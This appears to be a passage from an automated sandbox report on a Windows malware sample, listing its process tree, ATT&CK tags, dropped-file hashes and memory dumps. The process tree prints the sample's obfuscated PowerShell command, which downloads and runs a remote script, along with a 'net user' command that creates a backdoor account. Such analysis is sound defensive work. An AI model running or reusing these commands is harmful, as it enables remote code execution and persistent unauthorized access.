1⤵
- Suspicious use of WriteProcessMemory
PID:728

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
PID:200

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:3200

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
PID:3364

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1448

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
PID:2380

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2248

C:\Windows\System32\cmd.exe
cmd.exe /C net user wgautilacc 1234
1⤵
PID:2304

C:\Windows\system32\net.exe
net user wgautilacc 1234
2⤵
PID:1688

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc 1234
3⤵
PID:1568

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESAC53.tmp
MD5
c7b68b111e87d34fa2d465c659719179

SHA1
8bb9d5b5690b55ca13e15b86e4b7229e6833941f

SHA256
3a8e95480468bd40ff6f88ea6317c3ad01bf986fe5d2b393a29e9a6fedd09730

SHA512
87d90026930f881af79292f200b897db696ab0d7d3dac6d72682c013f6da76502782f8608a05f86c5d2d297e9feebc45f6ea8b0e244705ad2a45a88fffac6e3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1
MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
MD5
920b50692e0e9c4e32c79f89fafce0c4

SHA1
4cb71db2bb05daa4e84c649b6c58cbfd20c8e484

SHA256
85fda9140e2356752f4139c674b78e36e4bb5da57b7cff27d8db357a4357deaf

SHA512
966f23d6366c0a901114e84e64e9d209e77f1de6e40e93ad7d55047732b4ba213fdac8f05cd21cebfe11a0bab79e2cc95739fa3c6eb0eafc917568a7168c7d86

Download Submit
C:\Users\Admin\AppData\Local\Temp\vs1ezoe0\vs1ezoe0.dll
MD5
98bee00a697c41993ad40b7d9cf4736e

SHA1
3392807b8aaece64992db5c17273fc2140f3779d

SHA256
eeb288ca161e698c050e72c65771f107ceb07440d82eb83d47490349de059279

SHA512
3583a776cd0be2fbfe34ae2d76466ee2458f1f82ebe5a501009c78e08a3b754e9b469f92e2c9c8e905f146918429136cc4555a8faa0532d142f43118db412943

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vs1ezoe0\CSC29E85CA2AA6F4C6ABF3767A694F2658A.TMP
MD5
141b15e759b3312958cb6ce32f916f5b

SHA1
375e9d1a036f7d7ff111fd79006de6f5f9e74a9c

SHA256
3cf77bdca29501c5e3ec32c857ea82a43dfe9b1ad624eb16609e2296af617c0e

SHA512
0ebf0f0284324af8e6b65f3f81b177d30a2501ba9bcd5fc65231e24b34eb2ee1c72a4c7031e6b8b6c8722ddcdef36da290d9b9f4244dc6c3ae615b1e24b77e33

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vs1ezoe0\vs1ezoe0.0.cs
MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vs1ezoe0\vs1ezoe0.cmdline
MD5
f3f94e29ae2114b6b614c24f41170b93

SHA1
54b9b33c6f75f4b737d36ff00a9bf734ac6f070f

SHA256
cd1dddc3bcc64999a4874e00aeb492d56439e1127843c0eb0af27bf847b272f8

SHA512
c3829b864c25dcd10c2be1211ad78c9aae75a2ee18e8894236bddf23d97e159d7efa1010574c17a1f5df6a02e63c38fee30bd876fce6749ba31c194a6dafb820

Download Submit
\Windows\Branding\mediasrv.png
MD5
96a6c5d47b0670a98699b2b424e2e65e

SHA1
57a31831c368efd82801f94a1b72c7230f4288be

SHA256
bba6c1f56f0b7f40778d8e862aba528160e02890bb0313dfe1f934e4aafca05f

SHA512
b3107141bc206c12afc80c673463288057d6d302c44b568746af5e530f214c5e136ca7edb07c70afa0b6abd6720e7cd4917a4cdd6c82c7d3d5528b76222e6c55

Download Submit
\Windows\Branding\mediasvc.png
MD5
a3da4eee0a06c45c5bec80fd959ad539

SHA1
a8d2d3691af2e1af85ed8947347d0981017b7a32

SHA256
8a7fc19bdb25f16870854c72f936ed9598ffefc4da506bad61e13a890acfae9c

SHA512
8d3dcf7d05930b390f8c8928d8910c0b8aa19604d195c8ab4001b73a4866ad4adabc772bee9a391433c2946eeb427f4f1e08092ee8dc7056fe45a1db035e822b

Download Submit
memory/200-238-0x0000000000000000-mapping.dmp

Download
memory/416-231-0x0000000000000000-mapping.dmp

Download
memory/504-213-0x0000000000000000-mapping.dmp

Download
memory/728-211-0x0000000000000000-mapping.dmp

Download
memory/736-116-0x000001F26E190000-0x000001F26E192000-memory.dmp

Filesize
8KB

Download
memory/736-119-0x000001F26E196000-0x000001F26E197000-memory.dmp

Filesize
4KB

Download
memory/736-118-0x000001F26E195000-0x000001F26E196000-memory.dmp

Filesize
4KB

Download
memory/736-117-0x000001F26E193000-0x000001F26E195000-memory.dmp

Filesize
8KB

Download
memory/736-114-0x000001F2706A0000-0x000001F270AC1000-memory.dmp

Filesize
4.1MB

Download
memory/776-222-0x0000000000000000-mapping.dmp

Download
memory/780-218-0x0000000000000000-mapping.dmp

Download
memory/1012-235-0x0000000000000000-mapping.dmp

Download
memory/1060-219-0x0000000000000000-mapping.dmp

Download
memory/1204-225-0x0000000000000000-mapping.dmp

Download
memory/1316-140-0x0000000000000000-mapping.dmp

Download
memory/1448-209-0x000001B7762D8000-0x000001B7762DA000-memory.dmp

Filesize
8KB

Download
memory/1448-205-0x0000000000000000-mapping.dmp

Download
memory/1448-208-0x000001B7762D6000-0x000001B7762D8000-memory.dmp

Filesize
8KB

Download
memory/1448-207-0x000001B7762D3000-0x000001B7762D5000-memory.dmp

Filesize
8KB

Download
memory/1448-206-0x000001B7762D0000-0x000001B7762D2000-memory.dmp

Filesize
8KB

Download
memory/1496-249-0x0000000000000000-mapping.dmp

Download
memory/1568-247-0x0000000000000000-mapping.dmp

Download
memory/1628-167-0x000001943FB00000-0x000001943FB02000-memory.dmp

Filesize
8KB

Download
memory/1628-168-0x000001943FB03000-0x000001943FB05000-memory.dmp

Filesize
8KB

Download
memory/1628-192-0x000001943FB06000-0x000001943FB08000-memory.dmp

Filesize
8KB

Download
memory/1628-159-0x0000000000000000-mapping.dmp

Download
memory/1628-197-0x000001943FB08000-0x000001943FB0A000-memory.dmp

Filesize
8KB

Download
memory/1688-234-0x0000000000000000-mapping.dmp

Download
memory/1688-246-0x0000000000000000-mapping.dmp

Download
memory/1968-204-0x00000277CC526000-0x00000277CC528000-memory.dmp

Filesize
8KB

Download
memory/1968-201-0x0000000000000000-mapping.dmp

Download
memory/1968-229-0x0000000000000000-mapping.dmp

Download
memory/1968-202-0x00000277CC520000-0x00000277CC522000-memory.dmp

Filesize
8KB

Download
memory/1968-203-0x00000277CC523000-0x00000277CC525000-memory.dmp

Filesize
8KB

Download
memory/2128-215-0x0000000000000000-mapping.dmp

Download
memory/2248-242-0x0000019B7F410000-0x0000019B7F412000-memory.dmp

Filesize
8KB

Download
memory/2248-233-0x0000000000000000-mapping.dmp

Download
memory/2248-244-0x0000019B7F416000-0x0000019B7F418000-memory.dmp

Filesize
8KB

Download
memory/2248-243-0x0000019B7F413000-0x0000019B7F415000-memory.dmp

Filesize
8KB

Download
memory/2248-241-0x0000000000000000-mapping.dmp

Download
memory/2248-245-0x0000019B7F418000-0x0000019B7F419000-memory.dmp

Filesize
4KB

Download
memory/2304-217-0x0000000000000000-mapping.dmp

Download
memory/2308-228-0x0000000000000000-mapping.dmp

Download
memory/2380-240-0x0000000000000000-mapping.dmp

Download
memory/2572-210-0x0000000000000000-mapping.dmp

Download
memory/2588-220-0x0000000000000000-mapping.dmp

Download
memory/2592-227-0x0000000000000000-mapping.dmp

Download
memory/2832-226-0x0000000000000000-mapping.dmp

Download
memory/2832-212-0x0000000000000000-mapping.dmp

Download
memory/2860-130-0x0000018F777F3000-0x0000018F777F5000-memory.dmp

Filesize
8KB

Download
memory/2860-146-0x0000018F777F8000-0x0000018F777F9000-memory.dmp

Filesize
4KB

Download
memory/2860-129-0x0000018F777F0000-0x0000018F777F2000-memory.dmp

Filesize
8KB

Download
memory/2860-152-0x0000018F78630000-0x0000018F78631000-memory.dmp

Filesize
4KB

Download
memory/2860-128-0x0000018F77D50000-0x0000018F77D51000-memory.dmp

Filesize
4KB

Download
memory/2860-125-0x0000018F77500000-0x0000018F77501000-memory.dmp

Filesize
4KB

Download
memory/2860-120-0x0000000000000000-mapping.dmp

Download
memory/2860-151-0x0000018F782A0000-0x0000018F782A1000-memory.dmp

Filesize
4KB

Download
memory/2860-139-0x0000018F777F6000-0x0000018F777F8000-memory.dmp

Filesize
8KB

Download
memory/2860-144-0x0000018F77790000-0x0000018F77791000-memory.dmp

Filesize
4KB

Download
memory/3172-221-0x0000000000000000-mapping.dmp

Download
memory/3176-216-0x0000000000000000-mapping.dmp

Download
memory/3364-239-0x0000000000000000-mapping.dmp

Download
memory/3452-236-0x0000000000000000-mapping.dmp

Download
memory/3628-214-0x0000000000000000-mapping.dmp

Download
memory/3732-248-0x0000000000000000-mapping.dmp

Download
memory/3812-136-0x0000000000000000-mapping.dmp

Download
memory/3920-232-0x0000000000000000-mapping.dmp

Download
memory/3960-230-0x0000000000000000-mapping.dmp

Download